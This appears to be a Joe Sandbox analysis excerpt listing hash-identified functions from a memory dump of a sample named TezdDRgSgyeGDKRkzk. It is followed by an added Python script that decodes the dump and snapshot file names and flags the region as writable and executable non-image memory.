                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dd159758d6451d4f0213a5911381a12edb9fcc4e914b0f822c5c1a1933145e31
                                                                                          • Instruction ID: 154095b8b6831d1f9acf72681bb758ab0ed0e75b035a733b605b63a76a64ac00
                                                                                          • Opcode Fuzzy Hash: dd159758d6451d4f0213a5911381a12edb9fcc4e914b0f822c5c1a1933145e31
                                                                                          • Instruction Fuzzy Hash: 9B11C131A0E2AE8EE7129BB9C8211E97770EF46710F0545B3C044DB1E2CB386609CBD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: abc093e71b5265571e036a8682543f4392be6713ac9d6f10b3963daf8355addb
                                                                                          • Instruction ID: c2fcdb39c6b3f6977ed032fdd9f15a0c9f3573c1687acf3c52939bc662c38ed4
                                                                                          • Opcode Fuzzy Hash: abc093e71b5265571e036a8682543f4392be6713ac9d6f10b3963daf8355addb
                                                                                          • Instruction Fuzzy Hash: 0521B731E1952D8EEB64EB64C854BECB7F1FB58301F5081E9D04DA22A5DF34AA84DF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d46128adf5fbb98194db49ae0b5d3e0070eca9291d882baba8d8a46c5db06455
                                                                                          • Instruction ID: 61932c077dd71f4e241338ed31f71ef7048bf7a45c58c1b6f0c1bf68ac3c9f19
                                                                                          • Opcode Fuzzy Hash: d46128adf5fbb98194db49ae0b5d3e0070eca9291d882baba8d8a46c5db06455
                                                                                          • Instruction Fuzzy Hash: F811E531A0E29E8FE7129BB4C8215E97B70EF46710F0545B3C044DB1E6DB386609CBC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 174a9fcf0d7c9e40736ac9f0bc228607d36df36e92c5d05da1eacea33c077b4f
                                                                                          • Instruction ID: d5492d8e47fe860b48ffcb5eba94d9d485c05537ccfd3537a6fe2b480e5b87c9
                                                                                          • Opcode Fuzzy Hash: 174a9fcf0d7c9e40736ac9f0bc228607d36df36e92c5d05da1eacea33c077b4f
                                                                                          • Instruction Fuzzy Hash: B521C871E1513E8EEB64EB64C8547F8B6F1BB58301F4481E9908DA62A1DE389A84DF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf11475089af812a89e03fbe178ae80817f674ef6792f60ae1a1a76bdce1c194
                                                                                          • Instruction ID: 98ee442fb0f733506120f3bbfd3cda005cc5badf0f07ae0ee51cdba0f3b1cfe2
                                                                                          • Opcode Fuzzy Hash: bf11475089af812a89e03fbe178ae80817f674ef6792f60ae1a1a76bdce1c194
                                                                                          • Instruction Fuzzy Hash: 0301C430E0E29E8EE7129BB4C8205E97B70EF06700F0505B3C054DB1E7DB786608CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 72e1400b4a83262a0671b6a170623f6539ecdbbaa9aaf2f38158e00dd8520570
                                                                                          • Instruction ID: 330718a8cf84ff3d9b02fdfb2af03abb40e27c7c55b9a3679ca0073cb60c3667
                                                                                          • Opcode Fuzzy Hash: 72e1400b4a83262a0671b6a170623f6539ecdbbaa9aaf2f38158e00dd8520570
                                                                                          • Instruction Fuzzy Hash: C4011630A2864DCFCF44EF18C885AE977E0FB58308F15016AE85DD3254DB34E961CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 29aebe038e64a7f1366cc14ca6160183671c190f41f90d8cfc852356e28cdd8c
                                                                                          • Instruction ID: 987c58c93e2b04825f8743d4a366097a912801ef82a76e7df2e61d0545dadaf2
                                                                                          • Opcode Fuzzy Hash: 29aebe038e64a7f1366cc14ca6160183671c190f41f90d8cfc852356e28cdd8c
                                                                                          • Instruction Fuzzy Hash: EEF03030A1561E9FEB50EFA8D4596FEB7E0FF58300F510537E41CC21A4DA34A694CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 68268f4e7b793d02eabbf287a34ab4bfa0a4084f0e6e2602b4788f62ef5de01a
                                                                                          • Instruction ID: 70a621e0df96fe4e8241b3d1a55780915b7058487da122b9b420ab9b7b4c7d9d
                                                                                          • Opcode Fuzzy Hash: 68268f4e7b793d02eabbf287a34ab4bfa0a4084f0e6e2602b4788f62ef5de01a
                                                                                          • Instruction Fuzzy Hash: 0FF0BD70A1494D9FDF94EF58C889AAA7BE0FF28304F010466F819C3264D630E594CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3242d847077bc4ff9faa6e1977443c46c3f9c3550d05689897a882ffb98181ac
                                                                                          • Instruction ID: a0ab5b968191aca579e7a23ce0377c9f760d21ef67c29c764b0d6e9b2a2e2f39
                                                                                          • Opcode Fuzzy Hash: 3242d847077bc4ff9faa6e1977443c46c3f9c3550d05689897a882ffb98181ac
                                                                                          • Instruction Fuzzy Hash: 78F0D43091894D9FDF94EFA8C848AEA77E0FF28305F0104A6A818C31A5DB34E6A4CB41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dcddbc430b0bbd83e692c6a49d5c2de04d98967ff22ed2ac90f7a746978eed0e
                                                                                          • Instruction ID: df2f0b6ea1f44c47d167658e57d836bf8d47c321ff39d23ee017b4f62712171f
                                                                                          • Opcode Fuzzy Hash: dcddbc430b0bbd83e692c6a49d5c2de04d98967ff22ed2ac90f7a746978eed0e
                                                                                          • Instruction Fuzzy Hash: D0F0127091554E9FDB90EFA4C4496FA77E0FF58304F410566E81CD21A4DA74A6A0CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67882ea6afcff2133f05436827a3d0b3154bcbaa66c573799c21463266be478f
                                                                                          • Instruction ID: 0e0be3b42fb4b0d643248cbc95e970e5546bdc7050ba8f9435b6132bdae6dd11
                                                                                          • Opcode Fuzzy Hash: 67882ea6afcff2133f05436827a3d0b3154bcbaa66c573799c21463266be478f
                                                                                          • Instruction Fuzzy Hash: BCF04F70A1922B8EE768DBA4C8656BA73B0EF58701F04067AD419C22A2DB7866408AC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4994cb147239f9c23fcd30247dd0552762b4a8e5d4eb5851d50264c7e466e141
                                                                                          • Instruction ID: 3f755b08d147dfeca54b2bd26883e9c55989dc57fcad75a281ac8086de95627c
                                                                                          • Opcode Fuzzy Hash: 4994cb147239f9c23fcd30247dd0552762b4a8e5d4eb5851d50264c7e466e141
                                                                                          • Instruction Fuzzy Hash: 04E06D31A1A68EDBDB21FFA8D9012FD73A0FF05300F100476E41CC6091DA3466188781
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5036e010f9b8cbd487eea6128fcef98c5692dc39cfc3f53ff2891a1ce8b0448b
                                                                                          • Instruction ID: a3c104a0d916ed487d75676bbaf88c3acda09a6e562cc290d577feac1cac7244
                                                                                          • Opcode Fuzzy Hash: 5036e010f9b8cbd487eea6128fcef98c5692dc39cfc3f53ff2891a1ce8b0448b
                                                                                          • Instruction Fuzzy Hash: 37F03030E1912DCFD724DF54C8546E877F1BB54311F4481B5D049962A0EF38AA85DF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bff3fd38ac649e070fe0b826d7ed4473a830bddd1e43930d6fbc3c485553ae68
                                                                                          • Instruction ID: 17141df528c99279bfb167644349f68b266b9a02b6169d3ccd6af53655ee7a39
                                                                                          • Opcode Fuzzy Hash: bff3fd38ac649e070fe0b826d7ed4473a830bddd1e43930d6fbc3c485553ae68
                                                                                          • Instruction Fuzzy Hash: 80F01230E1956D4BE7A4DF68DC546E963B1EF86354F4002F7E00DA21E6DE342D428F41
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: c9$!k9$"s9$#{9
                                                                                          • API String ID: 0-1692736845
                                                                                          • Opcode ID: 3565950bdb7a8f0845e5cae50c68acbcf7ac919ffc63a2faeaca7c3511a6eab4
                                                                                          • Instruction ID: 5b80f909ba1b5a653889b7d499428f1a377dab6bf0d00c904fa52bbee01e2674
                                                                                          • Opcode Fuzzy Hash: 3565950bdb7a8f0845e5cae50c68acbcf7ac919ffc63a2faeaca7c3511a6eab4
                                                                                          • Instruction Fuzzy Hash: ED51D282B1943785E21F33FD792A8FD6B44DF4537DB0846B3D05E8A0EB5D48608792D5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000034.00000002.2576446616.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $)$8$w
                                                                                          • API String ID: 0-949773775
                                                                                          • Opcode ID: 6547ab1482418bea4e5546f468b92d2b3e9bc01e8141ba30b2d64fbc66adda8b
                                                                                          • Instruction ID: fdf34668b1c330ce1d278e5556f601c1312704e847bcd76fd31cc27d81615663
                                                                                          • Opcode Fuzzy Hash: 6547ab1482418bea4e5546f468b92d2b3e9bc01e8141ba30b2d64fbc66adda8b
                                                                                          • Instruction Fuzzy Hash: C031EA74E1952E8EEBB0EB64C8587A8B3F0EB58301F1142F5D00DE62A5DF745AC59F44
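As a worked reading of the identifiers that recur in every record above, here is an added Python example (it is not part of the Joe Sandbox report and not Joe Sandbox's own code). It parses the `.sdmp` memory-dump file name, cross-checks it against the snapshot file name, and flags the region as writable-and-executable non-image memory. The field layout of the `.sdmp` name is inferred from the records themselves: PID 0x34 = 52, dump index 2 and base 0x7FFD9B8B0000 reappear in `hcaresult_52_2_7ffd9b8b0000_...jbxd`. Treating the fifth dotted field as the page protection and the seventh as the memory type is an assumption; the constant values themselves (PAGE_EXECUTE_READWRITE = 0x40, MEM_PRIVATE = 0x20000, MEM_IMAGE = 0x1000000) are the documented Windows ones, and the sixth and eighth fields are left undecoded. The sample file names are the ones on this page.

```python
"""Decode Joe Sandbox memory-dump identifiers from function records.

Added example, not part of the sandbox report. The .sdmp field layout is
an assumption inferred from the records on this page; only PID, dump index
and base address are verified against the snapshot file name.
"""
import re
from dataclasses import dataclass

# Documented Windows page-protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Documented MEMORY_BASIC_INFORMATION.Type values.
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Sample names taken from the records on this page (not constructed).
SAMPLE_SDMP = ("00000034.00000002.2576446616.00007FFD9B8B0000."
               "00000040.00000800.00020000.00000000.sdmp")
SAMPLE_SNAPSHOT = "hcaresult_52_2_7ffd9b8b0000_TezdDRgSgyeGDKRkzk.jbxd"

# Assumed layout: pid.dump.sequence.base.f5.f6.f7.f8.sdmp (all hex except sequence).
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<f5>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<f7>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)
# Snapshot name: hcaresult_<pid decimal>_<dump decimal>_<base hex>_<id>.jbxd
SNAPSHOT_RE = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<dump>\d+)_(?P<base>[0-9A-Fa-f]+)_")


@dataclass(frozen=True)
class DumpSource:
    pid: int
    dump_index: int
    sequence: int
    base: int
    protect: int    # assumption: field 5 is the region's page protection
    mem_type: int   # assumption: field 7 is MEMORY_BASIC_INFORMATION.Type

    def protect_name(self) -> str:
        # Mask off modifier bits such as PAGE_GUARD (0x100) before lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")


def parse_sdmp(name: str) -> DumpSource:
    """Split a Joe Sandbox .sdmp file name into its fields; raise on anything else."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name}")
    return DumpSource(
        pid=int(m["pid"], 16),
        dump_index=int(m["dump"], 16),
        sequence=int(m["seq"]),
        base=int(m["base"], 16),
        protect=int(m["f5"], 16),
        mem_type=int(m["f7"], 16),
    )


def snapshot_matches(sdmp_name: str, snapshot_name: str) -> bool:
    """True if the snapshot file refers to the same PID, dump index and base address."""
    src = parse_sdmp(sdmp_name)
    m = SNAPSHOT_RE.match(snapshot_name)
    if not m:
        return False
    return (int(m["pid"]) == src.pid
            and int(m["dump"]) == src.dump_index
            and int(m["base"], 16) == src.base)


def is_rwx_non_image(src: DumpSource) -> bool:
    """Writable+executable memory that is not a mapped image: the footprint of
    JIT-compiled or unpacked code, which is why the report says 'based on PE: false'."""
    return (src.protect & 0xFF) == 0x40 and src.mem_type != MEM_IMAGE


if __name__ == "__main__":
    src = parse_sdmp(SAMPLE_SDMP)
    print(f"PID {src.pid}, dump #{src.dump_index}, base 0x{src.base:X}, "
          f"{src.protect_name()}, {src.type_name()}")
    print("snapshot consistent:", snapshot_matches(SAMPLE_SDMP, SAMPLE_SNAPSHOT))
    print("RWX non-image region:", is_rwx_non_image(src))
```

In triage this tells you which dump to open: the functions in these records all come from one RWX private region in process 52, second dump, so the JIT'd managed code is carved from that region rather than from a PE image, and the IDA snapshot named in each record is the one to load for it.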